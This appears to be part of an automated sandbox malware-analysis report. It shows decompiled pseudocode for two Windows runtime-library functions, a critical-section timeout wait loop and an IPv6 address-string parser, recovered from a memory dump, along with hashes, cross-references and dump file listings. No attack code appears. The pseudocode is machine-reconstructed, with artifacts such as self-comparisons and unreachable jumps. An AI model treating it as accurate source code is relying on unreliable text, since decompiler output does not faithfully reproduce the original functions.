                                                              0x020353d4
                                                              0x020353d6
                                                              0x00000000
                                                              0x020353d8
                                                              0x020353e3
                                                              0x020353ea
                                                              0x020353ea
                                                              0x020353d6
                                                              0x00000000

                                                              APIs
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 020722F4
                                                              Strings
                                                              • RTL: Re-Waiting, xrefs: 02072328
                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 020722FC
                                                              • RTL: Resource at %p, xrefs: 0207230B
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.686656983.0000000002000000.00000040.00000001.sdmp, Offset: 01FF0000, based on PE: true
                                                              • Associated: 00000007.00000002.686650959.0000000001FF0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686740727.00000000020E0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686747338.00000000020F0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686753560.00000000020F4000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686759385.00000000020F7000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686765984.0000000002100000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686816903.0000000002160000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                              • API String ID: 885266447-871070163
                                                              • Opcode ID: d4a666aec102997ec680b3db3c0381f2f8c32a45c3d3ddf8418ab837ceed538c
                                                              • Instruction ID: cba7b01d8d031cba51416ddc9eb92490642a7cc45a2c6d0cd297ff3301ec1b57
                                                              • Opcode Fuzzy Hash: d4a666aec102997ec680b3db3c0381f2f8c32a45c3d3ddf8418ab837ceed538c
                                                              • Instruction Fuzzy Hash: A051F7B16007166FEB169B24CCC0FE777DDAF58724F104219ED45DB290EB61E841AB94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0203EC56, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 51%
                                                              			E0203EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __esi;
				intOrPtr _t38;
				intOrPtr _t39;
				signed int _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t44;
				void* _t46;
				intOrPtr _t48;
				signed int _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				signed char _t67;
				void* _t72;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t84;
				intOrPtr* _t85;
				void* _t91;
				void* _t92;
				void* _t93;

				_t80 = __edi;
				_t75 = __edx;
				_t70 = __ecx;
				_t84 = _a4;
				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
					E0202DA92(__ecx, __edx, __eflags, _t84);
					_t38 =  *((intOrPtr*)(_t84 + 0x10));
				}
				_push(0);
				__eflags = _t38 - 0xffffffff;
				if(_t38 == 0xffffffff) {
					_t39 =  *0x20f793c; // 0x0
					_push(0);
					_push(_t84);
					_t40 = E020116C0(_t39);
				} else {
					_t40 = E0200F9D4(_t38);
				}
				_pop(_t85);
				__eflags = _t40;
				if(__eflags < 0) {
					_push(_t40);
					E02053915(_t67, _t70, _t75, _t80, _t85, __eflags);
					asm("int3");
					while(1) {
						L21:
						_t76 =  *[fs:0x18];
						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						__eflags =  *(_t42 + 0x240) & 0x00000002;
						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
							_v66 = 0x1722;
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_t76 =  &_v72;
							_push( &_v72);
							_v28 = _t85;
							_v40 =  *((intOrPtr*)(_t85 + 4));
							_v32 =  *((intOrPtr*)(_t85 + 0xc));
							_push(0x10);
							_push(0x20402);
							E020101A4( *0x7ffe0382 & 0x000000ff);
						}
						while(1) {
							_t43 = _v8;
							_push(_t80);
							_push(0);
							__eflags = _t43 - 0xffffffff;
							if(_t43 == 0xffffffff) {
								_t71 =  *0x20f793c; // 0x0
								_push(_t85);
								_t44 = E02011F28(_t71);
							} else {
								_t44 = E0200F8CC(_t43);
							}
							__eflags = _t44 - 0x102;
							if(_t44 != 0x102) {
								__eflags = _t44;
								if(__eflags < 0) {
									_push(_t44);
									E02053915(_t67, _t71, _t76, _t80, _t85, __eflags);
									asm("int3");
									E02092306(_t85);
									__eflags = _t67 & 0x00000002;
									if((_t67 & 0x00000002) != 0) {
										_t7 = _t67 + 2; // 0x4
										_t72 = _t7;
										asm("lock cmpxchg [edi], ecx");
										__eflags = _t67 - _t67;
										if(_t67 == _t67) {
											E0203EC56(_t72, _t76, _t80, _t85);
										}
									}
									return 0;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
									}
									return 2;
								}
								goto L36;
							}
							_t77 =  *((intOrPtr*)(_t80 + 4));
							_push(_t67);
							_t46 = E02054FC0( *_t80, _t77, 0xff676980, 0xffffffff);
							_push(_t77);
							E02063F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
							_t48 =  *_t85;
							_t92 = _t91 + 0x18;
							__eflags = _t48 - 0xffffffff;
							if(_t48 == 0xffffffff) {
								_t49 = 0;
								__eflags = 0;
							} else {
								_t49 =  *((intOrPtr*)(_t48 + 0x14));
							}
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_push(_t49);
							_t50 = _v12;
							_t76 =  *((intOrPtr*)(_t50 + 0x24));
							_push(_t85);
							_push( *((intOrPtr*)(_t85 + 0xc)));
							_push( *((intOrPtr*)(_t50 + 0x24)));
							E02063F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
							_t53 =  *_t85;
							_t93 = _t92 + 0x20;
							_t67 = _t67 + 1;
							__eflags = _t53 - 0xffffffff;
							if(_t53 != 0xffffffff) {
								_t71 =  *((intOrPtr*)(_t53 + 0x14));
								_a4 =  *((intOrPtr*)(_t53 + 0x14));
							}
							__eflags = _t67 - 2;
							if(_t67 > 2) {
								__eflags = _t85 - 0x20f20c0;
								if(_t85 != 0x20f20c0) {
									_t76 = _a4;
									__eflags = _a4 - _a8;
									if(__eflags == 0) {
										E0209217A(_t71, __eflags, _t85);
									}
								}
							}
							_push("RTL: Re-Waiting\n");
							_push(0);
							_push(0x65);
							_a8 = _a4;
							E02063F92();
							_t91 = _t93 + 0xc;
							__eflags =  *0x7ffe0382;
							if( *0x7ffe0382 != 0) {
								goto L21;
							}
						}
						goto L36;
					}
				} else {
					return _t40;
				}
				L36:
			}

































                                                              0x0203ec56
                                                              0x0203ec56
                                                              0x0203ec56
                                                              0x0203ec5c
                                                              0x0203ec64
                                                              0x020723e6
                                                              0x020723eb
                                                              0x020723eb
                                                              0x0203ec6a
                                                              0x0203ec6c
                                                              0x0203ec6f
                                                              0x020723f3
                                                              0x020723f8
                                                              0x020723fa
                                                              0x020723fc
                                                              0x0203ec75
                                                              0x0203ec76
                                                              0x0203ec76
                                                              0x0203ec7b
                                                              0x0203ec7c
                                                              0x0203ec7e
                                                              0x02072406
                                                              0x02072407
                                                              0x0207240c
                                                              0x0207240d
                                                              0x0207240d
                                                              0x0207240d
                                                              0x02072414
                                                              0x02072417
                                                              0x0207241e
                                                              0x02072435
                                                              0x02072438
                                                              0x0207243c
                                                              0x0207243f
                                                              0x02072442
                                                              0x02072443
                                                              0x02072446
                                                              0x02072449
                                                              0x02072453
                                                              0x02072455
                                                              0x0207245b
                                                              0x0207245b
                                                              0x0203eb99
                                                              0x0203eb99
                                                              0x0203eb9c
                                                              0x0203eb9d
                                                              0x0203eb9f
                                                              0x0203eba2
                                                              0x02072465
                                                              0x0207246b
                                                              0x0207246d
                                                              0x0203eba8
                                                              0x0203eba9
                                                              0x0203eba9
                                                              0x0203ebae
                                                              0x0203ebb3
                                                              0x0203ebb9
                                                              0x0203ebbb
                                                              0x02072513
                                                              0x02072514
                                                              0x02072519
                                                              0x0207251b
                                                              0x0203ec2a
                                                              0x0203ec2d
                                                              0x0203ec33
                                                              0x0203ec36
                                                              0x0203ec3a
                                                              0x0203ec3e
                                                              0x0203ec40
                                                              0x0203ec47
                                                              0x0203ec47
                                                              0x0203ec40
                                                              0x020122c6
                                                              0x0203ebc1
                                                              0x0203ebc1
                                                              0x0203ebc5
                                                              0x0203ec9a
                                                              0x0203ec9a
                                                              0x0203ebd6
                                                              0x0203ebd6
                                                              0x00000000
                                                              0x0203ebbb
                                                              0x02072477
                                                              0x0207247c
                                                              0x02072486
                                                              0x0207248b
                                                              0x02072496
                                                              0x0207249b
                                                              0x0207249d
                                                              0x020724a0
                                                              0x020724a3
                                                              0x020724aa
                                                              0x020724aa
                                                              0x020724a5
                                                              0x020724a5
                                                              0x020724a5
                                                              0x020724ac
                                                              0x020724af
                                                              0x020724b0
                                                              0x020724b3
                                                              0x020724b9
                                                              0x020724ba
                                                              0x020724bb
                                                              0x020724c6
                                                              0x020724cb
                                                              0x020724cd
                                                              0x020724d0
                                                              0x020724d1
                                                              0x020724d4
                                                              0x020724d6
                                                              0x020724d9
                                                              0x020724d9
                                                              0x020724dc
                                                              0x020724df
                                                              0x020724e1
                                                              0x020724e7
                                                              0x020724e9
                                                              0x020724ec
                                                              0x020724ef
                                                              0x020724f2
                                                              0x020724f2
                                                              0x020724ef
                                                              0x020724e7
                                                              0x020724fa
                                                              0x020724ff
                                                              0x02072501
                                                              0x02072503
                                                              0x02072506
                                                              0x0207250b
                                                              0x0203eb8c
                                                              0x0203eb93
                                                              0x00000000
                                                              0x00000000
                                                              0x0203eb93
                                                              0x00000000
                                                              0x0203eb99
                                                              0x0203ec85
                                                              0x0203ec85
                                                              0x0203ec85
                                                              0x00000000

                                                              Strings
                                                              • RTL: Re-Waiting, xrefs: 020724FA
                                                              • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 0207248D
                                                              • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 020724BD
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.686656983.0000000002000000.00000040.00000001.sdmp, Offset: 01FF0000, based on PE: true
                                                              • Associated: 00000007.00000002.686650959.0000000001FF0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686740727.00000000020E0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686747338.00000000020F0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686753560.00000000020F4000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686759385.00000000020F7000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686765984.0000000002100000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686816903.0000000002160000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                              • API String ID: 0-3177188983
                                                              • Opcode ID: efc392ec06278b2184e28dc27c2587f02ff6d5dca5447b53872518f0fc1cd435
                                                              • Instruction ID: 3debd61edaee847c665a67c3349a461c5cea1ed26ac4330ab07bab560d7a46f3
                                                              • Opcode Fuzzy Hash: efc392ec06278b2184e28dc27c2587f02ff6d5dca5447b53872518f0fc1cd435
                                                              • Instruction Fuzzy Hash: 9C41B2B0A00304AFDB61DB68CC88FAE77F9AF44720F108655FA559B2D0D734E941EBA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0204FCC9, Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E0204FCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t105;
				void* _t110;
				char _t114;
				short _t115;
				void* _t118;
				signed short* _t119;
				short _t120;
				char _t122;
				void* _t127;
				void* _t130;
				signed int _t136;
				intOrPtr _t143;
				signed int _t158;
				signed short* _t164;
				signed int _t167;
				void* _t170;

				_t158 = 0;
				_t164 = _a4;
				_v20 = 0;
				_v24 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_v28 = 0;
				_t136 = 0;
				while(1) {
					_t167 =  *_t164 & 0x0000ffff;
					if(_t167 == _t158) {
						break;
					}
					_t118 = _v20 - _t158;
					if(_t118 == 0) {
						if(_t167 == 0x3a) {
							if(_v12 > _t158 || _v8 > _t158) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									break;
								}
								_t143 = 2;
								 *((short*)(_a12 + _t136 * 2)) = 0;
								_v28 = 1;
								_v8 = _t143;
								_t136 = _t136 + 1;
								L47:
								_t164 = _t119;
								_v20 = _t143;
								L14:
								if(_v24 == _t158) {
									L19:
									_t164 =  &(_t164[1]);
									_t158 = 0;
									continue;
								}
								if(_v12 == _t158) {
									if(_v16 > 4) {
										L29:
										return 0xc000000d;
									}
									_t120 = E0204EE02(_v24, _t158, 0x10);
									_t170 = _t170 + 0xc;
									 *((short*)(_a12 + _t136 * 2)) = _t120;
									_t136 = _t136 + 1;
									goto L19;
								}
								if(_v16 > 3) {
									goto L29;
								}
								_t122 = E0204EE02(_v24, _t158, 0xa);
								_t170 = _t170 + 0xc;
								if(_t122 > 0xff) {
									goto L29;
								}
								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
								goto L19;
							}
						}
						L21:
						if(_v8 > 7 || _t167 >= 0x80) {
							break;
						} else {
							if(E0204685D(_t167, 4) == 0) {
								if(E0204685D(_t167, 0x80) != 0) {
									if(_v12 > 0) {
										break;
									}
									_t127 = 1;
									_a7 = 1;
									_v24 = _t164;
									_v20 = 1;
									_v16 = 1;
									L36:
									if(_v20 == _t127) {
										goto L19;
									}
									_t158 = 0;
									goto L14;
								}
								break;
							}
							_a7 = 0;
							_v24 = _t164;
							_v20 = 1;
							_v16 = 1;
							goto L19;
						}
					}
					_t130 = _t118 - 1;
					if(_t130 != 0) {
						if(_t130 == 1) {
							goto L21;
						}
						_t127 = 1;
						goto L36;
					}
					if(_t167 >= 0x80) {
						L7:
						if(_t167 == 0x3a) {
							_t158 = 0;
							if(_v12 > 0 || _v8 > 6) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									_v8 = _v8 + 1;
									L13:
									_v20 = _t158;
									goto L14;
								}
								if(_v28 != 0) {
									break;
								}
								_v28 = _v8 + 1;
								_t143 = 2;
								_v8 = _v8 + _t143;
								goto L47;
							}
						}
						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
							break;
						} else {
							_v12 = _v12 + 1;
							_t158 = 0;
							goto L13;
						}
					}
					if(E0204685D(_t167, 4) != 0) {
						_v16 = _v16 + 1;
						goto L19;
					}
					if(E0204685D(_t167, 0x80) != 0) {
						_v16 = _v16 + 1;
						if(_v12 > 0) {
							break;
						}
						_a7 = 1;
						goto L19;
					}
					goto L7;
				}
				 *_a8 = _t164;
				if(_v12 != 0) {
					if(_v12 != 3) {
						goto L29;
					}
					_v8 = _v8 + 1;
				}
				if(_v28 != 0 || _v8 == 7) {
					if(_v20 != 1) {
						if(_v20 != 2) {
							goto L29;
						}
						 *((short*)(_a12 + _t136 * 2)) = 0;
						L65:
						_t105 = _v28;
						if(_t105 != 0) {
							_t98 = (_t105 - _v8) * 2; // 0x11
							E02028980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
							_t110 = 8;
							E0201DFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
						}
						return 0;
					}
					if(_v12 != 0) {
						if(_v16 > 3) {
							goto L29;
						}
						_t114 = E0204EE02(_v24, 0, 0xa);
						_t170 = _t170 + 0xc;
						if(_t114 > 0xff) {
							goto L29;
						}
						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
						goto L65;
					}
					if(_v16 > 4) {
						goto L29;
					}
					_t115 = E0204EE02(_v24, 0, 0x10);
					_t170 = _t170 + 0xc;
					 *((short*)(_a12 + _t136 * 2)) = _t115;
					goto L65;
				} else {
					goto L29;
				}
			}

























                                                              0x0204fcd1
                                                              0x0204fcd6
                                                              0x0204fcd9
                                                              0x0204fcdc
                                                              0x0204fcdf
                                                              0x0204fce2
                                                              0x0204fce5
                                                              0x0204fce8
                                                              0x0204fceb
                                                              0x0204fced
                                                              0x0204fced
                                                              0x0204fcf3
                                                              0x00000000
                                                              0x00000000
                                                              0x0204fcfc
                                                              0x0204fcfe
                                                              0x0204fdc1
                                                              0x0207ecbd
                                                              0x00000000
                                                              0x0207eccc
                                                              0x0207eccc
                                                              0x0207ecd2
                                                              0x00000000
                                                              0x00000000
                                                              0x0207ecdf
                                                              0x0207ece0
                                                              0x0207ece4
                                                              0x0207eceb
                                                              0x0207ecee
                                                              0x0207eca8
                                                              0x0207eca8
                                                              0x0207ecaa
                                                              0x0204fd76
                                                              0x0204fd79
                                                              0x0204fdb4
                                                              0x0204fdb5
                                                              0x0204fdb6
                                                              0x00000000
                                                              0x0204fdb6
                                                              0x0204fd7e
                                                              0x0207ecfc
                                                              0x0204fe2f
                                                              0x00000000
                                                              0x0204fe2f
                                                              0x0207ed08
                                                              0x0207ed0f
                                                              0x0207ed17
                                                              0x0207ed1b
                                                              0x00000000
                                                              0x0207ed1b
                                                              0x0204fd88
                                                              0x00000000
                                                              0x00000000
                                                              0x0204fd94
                                                              0x0204fd99
                                                              0x0204fda1
                                                              0x00000000
                                                              0x00000000
                                                              0x0204fdb0
                                                              0x00000000
                                                              0x0204fdb0
                                                              0x0207ecbd
                                                              0x0204fdc7
                                                              0x0204fdcb
                                                              0x00000000
                                                              0x0204fdd7
                                                              0x0204fde3
                                                              0x0204fe06
                                                              0x02061fe7
                                                              0x00000000
                                                              0x00000000
                                                              0x02061fef
                                                              0x02061ff0
                                                              0x02061ff4
                                                              0x02061ff7
                                                              0x02061ffa
                                                              0x02061ffd
                                                              0x02062000
                                                              0x00000000
                                                              0x00000000
                                                              0x0207ecf1
                                                              0x00000000
                                                              0x0207ecf1
                                                              0x00000000
                                                              0x0204fe06
                                                              0x0204fde8
                                                              0x0204fdec
                                                              0x0204fdef
                                                              0x0204fdf2
                                                              0x00000000
                                                              0x0204fdf2
                                                              0x0204fdcb
                                                              0x0204fd04
                                                              0x0204fd05
                                                              0x0207ec67
                                                              0x00000000
                                                              0x00000000
                                                              0x0207ec6f
                                                              0x00000000
                                                              0x0207ec6f
                                                              0x0204fd13
                                                              0x0204fd3c
                                                              0x0204fd40
                                                              0x0207ec75
                                                              0x0207ec7a
                                                              0x00000000
                                                              0x0207ec8a
                                                              0x0207ec8a
                                                              0x0207ec90
                                                              0x0207ecb2
                                                              0x0204fd73
                                                              0x0204fd73
                                                              0x00000000
                                                              0x0204fd73
                                                              0x0207ec95
                                                              0x00000000
                                                              0x00000000
                                                              0x0207eca1
                                                              0x0207eca4
                                                              0x0207eca5
                                                              0x00000000
                                                              0x0207eca5
                                                              0x0207ec7a
                                                              0x0204fd4a
                                                              0x00000000
                                                              0x0204fd6e
                                                              0x0204fd6e
                                                              0x0204fd71
                                                              0x00000000
                                                              0x0204fd71
                                                              0x0204fd4a
                                                              0x0204fd21
                                                              0x0205a3a1
                                                              0x00000000
                                                              0x0205a3a1
                                                              0x0204fd36
                                                              0x0206200b
                                                              0x02062012
                                                              0x00000000
                                                              0x00000000
                                                              0x02062018
                                                              0x00000000
                                                              0x02062018
                                                              0x00000000
                                                              0x0204fd36
                                                              0x0204fe0f
                                                              0x0204fe16
                                                              0x0205a3ad
                                                              0x00000000
                                                              0x00000000
                                                              0x0205a3b3
                                                              0x0205a3b3
                                                              0x0204fe1f
                                                              0x0207ed25
                                                              0x0207ed86
                                                              0x00000000
                                                              0x00000000
                                                              0x0207ed91
                                                              0x0207ed95
                                                              0x0207ed95
                                                              0x0207ed9a
                                                              0x0207edad
                                                              0x0207edb3
                                                              0x0207edba
                                                              0x0207edc4
                                                              0x0207edc9
                                                              0x00000000
                                                              0x0207edcc
                                                              0x0207ed2a
                                                              0x0207ed55
                                                              0x00000000
                                                              0x00000000
                                                              0x0207ed61
                                                              0x0207ed66
                                                              0x0207ed6e
                                                              0x00000000
                                                              0x00000000
                                                              0x0207ed7d
                                                              0x00000000
                                                              0x0207ed7d
                                                              0x0207ed30
                                                              0x00000000
                                                              0x00000000
                                                              0x0207ed3c
                                                              0x0207ed43
                                                              0x0207ed4b
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.686656983.0000000002000000.00000040.00000001.sdmp, Offset: 01FF0000, based on PE: true
                                                              • Associated: 00000007.00000002.686650959.0000000001FF0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686740727.00000000020E0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686747338.00000000020F0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686753560.00000000020F4000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686759385.00000000020F7000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686765984.0000000002100000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686816903.0000000002160000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: __fassign
                                                              • String ID:
                                                              • API String ID: 3965848254-0
                                                              • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                              • Instruction ID: f43cf34e722000989ec3a8c4b396f0380e7496f1627bed7426020a09e66b15ba
                                                              • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                              • Instruction Fuzzy Hash: 3991ADB1D0031AEEDF25CF9AC8486EEBBF5FB41309F20C0BAD405A6551EB705A41EB95
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%